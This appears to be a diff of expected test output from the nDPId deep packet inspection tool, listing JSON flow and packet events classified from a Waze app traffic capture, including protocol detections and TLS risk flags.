-00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587869162,"flow_last_seen":1435587869302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871656,"flow_last_seen":1435587871946,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871658,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871941,"flow_last_seen":1435587872478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":552,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872476,"flow_last_seen":1435587872705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872702,"flow_last_seen":1435587872838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":543,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} -00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587898822,"flow_last_seen":1435587899372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880579,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880579,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00920{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1435587868634,"flow_last_seen":1435587888318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17204,"flow_tot_l4_payload_len":79914,"flow_avg_l4_payload_len":746,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587868635,"flow_last_seen":1435587884546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3606,"flow_tot_l4_payload_len":9966,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00918{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1435587894241,"flow_last_seen":1435587901093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":5269,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00918{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587905035,"flow_last_seen":1435587907392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":4480,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1435587878606,"flow_last_seen":1435587882306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11132,"flow_tot_l4_payload_len":42871,"flow_avg_l4_payload_len":1339,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1435587879018,"flow_last_seen":1435587882336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00817{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1435587879850,"flow_last_seen":1435587883075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8096,"flow_tot_l4_payload_len":26354,"flow_avg_l4_payload_len":941,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880587,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00571{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880587,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1435587871939,"flow_last_seen":1435587873226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3994,"flow_tot_l4_payload_len":8301,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1435587868996,"flow_last_seen":1435587869400,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":1420,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1435587878215,"flow_last_seen":1435587880857,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21888,"flow_tot_l4_payload_len":57094,"flow_avg_l4_payload_len":1730,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587871918,"flow_last_seen":1435587874945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1435587871929,"flow_last_seen":1435587874378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":4561,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1435587871935,"flow_last_seen":1435587874495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880578,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880578,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880576,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880576,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880583,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00569{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880583,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587867755,"flow_last_seen":1435587873026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11779,"flow_tot_l4_payload_len":61187,"flow_avg_l4_payload_len":1653,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880577,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880577,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880589,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880589,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867755,"flow_last_seen":1435587867755,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587867755,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1435587867755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587867755,"pkt":"ABoRAAACABoRAAABCABFAAA8zNlAAEAGoisKCAABQSeAh9aDAFDjx6dUAAAAAKAC\/\/+uwgAAAgQFtAQCCAoACGuNAAAAAAEDAwg="} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1435587867759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587867759,"pkt":"ABoRAAACABoRAAABCABFAAAodHFAABAGKqhBJ4CHCggAAQBQ1oMcOFir48enVVAS\/\/8NRwAA"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1435587867759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587867759,"pkt":"ABoRAAACABoRAAABCABFAAAozNpAAEAGoj4KCAABQSeAh9aDAFDjx6dVHDhYrFAQ\/\/8NSAAA"} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587867755,"flow_last_seen":1435587867781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1435587867781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":0,"content_type":"","user_agent":"Android"}} 